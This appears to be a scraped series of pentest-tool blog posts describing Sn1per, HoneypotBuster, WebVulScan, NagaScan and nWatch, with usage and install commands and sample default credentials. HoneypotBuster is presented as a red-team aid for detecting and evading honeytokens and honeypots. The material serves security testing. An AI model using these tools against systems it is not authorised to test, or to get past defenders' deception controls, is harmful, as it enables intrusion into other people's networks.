Quickly enumerates open ports/services on multiple hosts and performs basic fingerprinting. To use, specify the full location of the file which contains all hosts, IP’s that need to be scanned and run ./sn1per /full/path/to/targets.txt airstrike to begin scanning.NUKE: Launch full audit of multiple hosts specified in text file of choice. Usage example: ./sniper /pentest/loot/targets.txt nuke.LOOT: Automatically organizes and displays loot folder in your browser and opens Metasploit Pro and Zenmap GUI with all port scan results. To run, type ‘sniper loot’.SAMPLE REPORT:https://gist.github.com/1N3/8214ec2da2c91691bcbcDownload Sn1per

Link: http://feedproxy.google.com/~r/PentestTools/~3/zeJDkt2D7ew/sn1per-automated-pentest-recon-scanner.html

HoneypotBuster – Microsoft PowerShell Module to Find HoneyPots and HoneyTokens in the Network

Microsoft PowerShell module designed for red teams that can be used to find honeypots and honeytokens in the network or at the host.CodeExecutionExecute code on a target machine using Import-Module.Invoke-HoneypotBusterHoneypotBuster is a tool designed to spot Honey Tokens, Honey Bread Crumbs, and Honey Pots used by common Distributed Deception vendors. This tool will help spot the following deception techniques:1. Kerberoasting Service Accounts Honey TokensJust like the one described in the ADSecurity article by Sean Metcalf, this tricks attackers to scan for Domain Users with assigned SPN (Service Principal Name) and {adminCount = 1} LDAP Attribute flag. So when you try to request TGS for that user, you’ll be exposed as Kerberoasting attempt. TGS definition: A ticket granting server (TGS) is a logical key distribution center (KDC) component that is used by the Kerberos protocol as a trusted third party.2. Fake Computer Accounts Honey PotsCreating many domain computer objects with no actual devices associated to them will result in confusion to any attacker trying to study the network. Any attempt to perform lateral movement into these fake objects will lead to exposure of the attacker.3. Fake Credentials Manager Credentials BreadcrumbsMany deception vendors are injecting fake credentials into the “Credentials Manager”. These credentials will also be revealed using tools such as Mimikatz. Although they aren’t real, attackers might confuse them as authentic credentials and use them.4. Fake Domain Admins Accounts Honey TokensCreating several domain admins and their credentials who have never been active is bad policy. These Honey Tokens lure attackers to try brute-forcing domain admin credentials. Once someone tries to authenticate to this user, an alarm will be triggered, and the attacker will be revealed. Microsoft ATA uses this method.5. Fake Mapped Drives BreadcrumbsMany malicious automated scripts and worms are spreading via SMB Shares, especially if they’re mapped as Network Drive Share. This tool will try to correlate some of the data collected before to identify any mapped drive related to a specific Honey Pot server.6. DNS Records Manipulation HoneyPotsOne of the methods deception vendors use to detect fake endpoints is registering their DNS records towards the Honey Pot Server. They will then be able to point the attacker directly to their honey pot instead of actual endpoints.UsageTo install any of these modules, drop the PowerShell scripts into a directory and typeImport-Module PathTo\scriptName.ps1Then run the Module from the Powershell.Refer to the comment-based help in each individual script for detailed usage information.Download HoneypotBuster

Link: http://feedproxy.google.com/~r/PentestTools/~3/0QHsIeHrw-s/honeypotbuster-microsoft-powershell.html

WebVulScan – Web Application Vulnerability Scanner

WebVulScan is a web application vulnerability scanner. It is a web application itself written in PHP and can be used to test remote, or local, web applications for security vulnerabilities. As a scan is running, details of the scan are dynamically updated to the user. These details include the status of the scan, the number of URLs found on the web application, the number of vulnerabilities found and details of the vulnerabilities found.After a scan is complete, a detailed PDF report is emailed to the user. The report includes descriptions of the vulnerabilities found, recommendations and details of where and how each vulnerability was exploited.The vulnerabilities tested by WebVulScan are:Reflected Cross-Site ScriptingStored Cross-Site ScriptingStandard SQL InjectionBroken Authentication using SQL InjectionAutocomplete Enabled on Password FieldsPotentially Insecure Direct Object ReferencesDirectory Listing EnabledHTTP Banner DisclosureSSL Certificate not TrustedUnvalidated RedirectsFeatures:Crawler: Crawls a website to identify and display all URLs belonging to the website.Scanner: Crawls a website and scans all URLs found for vulnerabilities.Scan History: Allows a user to view or download PDF reports of previous scans that they performed.Register: Allows a user to register with the web application.Login: Allows a user to login to the web application.Options: Allows a user to select which vulnerabilities they wish to test for (all are enabled by default).PDF Generation: Dynamically generates a detailed PDF report.Report Delivery: The PDF report is emailed to the user as an attachment.Download WebVulScan

Link: http://feedproxy.google.com/~r/PentestTools/~3/NmKC38VHoXw/webvulscan-web-application.html

NagaScan – NagaScan is a distributed passive scanner for Web application.

What is NagaScanNagaScan is a distributed passive vulnerability scanner for Web application.What NagaScan doNagaScan currently support some common Web application vulnerabilities, e.g. XSS, SQL Injection, File Inclusion etcHow NagaScan workConfig a proxy, e.g. Web Browser proxy or mobile Wi-Fi proxy, the traffic (including requests headers, cookies, post data, URLs, etc) will be mirrored and parsed into our central database, then NagaScan will be automatically assigned to distributed scanners to scan the common web application vulnerabilities.RequirementsWeb Consolesudo pip install mysql-connectorsudo pip install jinja2sudo pip install bleachScannersudo apt-get install python-pip python-dev libmysqlclient-devsudo pip install requestssudo pip install MySQL-pythonsudo pip install -U seleniumsudo apt-get install libfontconfigProxysudo apt-get install python-pip python-dev libmysqlclient-devsudo pip install MySQL-pythonInstallation & ConfigurationDatabaseInstall MySQL and create a db user and password, e.g. root/toorCreate database for NagaScan by using command source schema.sqlWeb ConsoleModify www/config_override.py with your own DB configuration for Web consoleconfigs = { ‘db’: { ‘host’: ‘127.0.0.1’, ‘user’: ‘root’, ‘password’: ‘toor’ }}Run sudo python www/wsgiapp.py to start Web consoleScannerModify scanner/lib/db_operation.py with your own DB configuration for Scannerdef db_conn(): try: user = “root" pwd = "toor" hostname = "127.0.0.1"Install PhantomJs Linux 64-bit: wget https://bitbucket.org/ariya/phantomjs/downloads/phantomjs-2.1.1-linux-x86_64.tar.bz2tar -jxvf phantomjs-2.1.1-linux-x86_64.tar.bz2Linux 32-bit: wget https://bitbucket.org/ariya/phantomjs/downloads/phantomjs-2.1.1-linux-i686.tar.bz2tar -jxvf phantomjs-2.1.1-linux-i686.tar.bz2Modify scanner/lib/hack_requests.py in line 28 as belowself.executable_path='[Your Own Phantomjs Binary Path]’ # e.g. /home/ubuntu/phantomjs-2.1.1-linux-x86_64/bin/phantomjsRun below commands to start Scanner python scanner/scan_fi.py to scan File Inclusionpython scanner/scan_xss.py to scan XSSpython scanner/scan_sqli.py to scan SQL injectionProxy & ParserInstall MitmProxy Ubuntu 16.04 (Preferred): sudo apt-get install python3-dev python3-pip libffi-dev libssl-devsudo pip3 install mitmproxyUbuntu 14.04: sudo apt-get install python-pip python-dev libffi-dev libssl-dev libxml2-dev libxslt1-dev libjpeg8-dev zlib1g-devsudo pip install "mitmproxy==0.18.2"MacOS: brew install python3brew install mitmproxyRun mitmdump -p 443 -s "proxy/proxy_mitmproxy.py /tmp/logs.txt" to start ProxyModify parser/lib/db_operation.py with your own DB configuration for Parserdef db_conn(): try: user = "root" pwd = "toor" hostname = "127.0.0.1"Run python parser/parser_mitmproxy.py /tmp/logs.txt to start ParserUsageAccess to Web Console with the default username and password (nagascan@example.com/Naga5c@n) to config exclusions and add SQLMAP serverInstall MitmProxy certificates for Browser or Mobile per InstructionAdd a proxy you created in your Web Browser or Mobile Wi-FiJust browse websites from Browser or use APPs from Mobile whatever you likeHave fun!Download NagaScan

Link: http://feedproxy.google.com/~r/PentestTools/~3/OIaIaPvYeq4/nagascan-nagascan-is-distributed.html

nWatch – Tool for Host Discovery, PortScanning and Operating System Fingerprinting

nWatch is a handy tool for host discovery, portscanning and operating system fingerprinting.Demo videoRequirementsnmapscapycoloramactypesInstallation and executionInstall the requirements Then you can download nWatch by cloning the Git repository:git clone https://github.com/suraj-root/nWatch.gitcd nWatch/python nwatch.py For educational purposes only.Download nWatch

Link: http://feedproxy.google.com/~r/PentestTools/~3/t0y3uiyNccU/nwatch-tool-for-host-discovery.html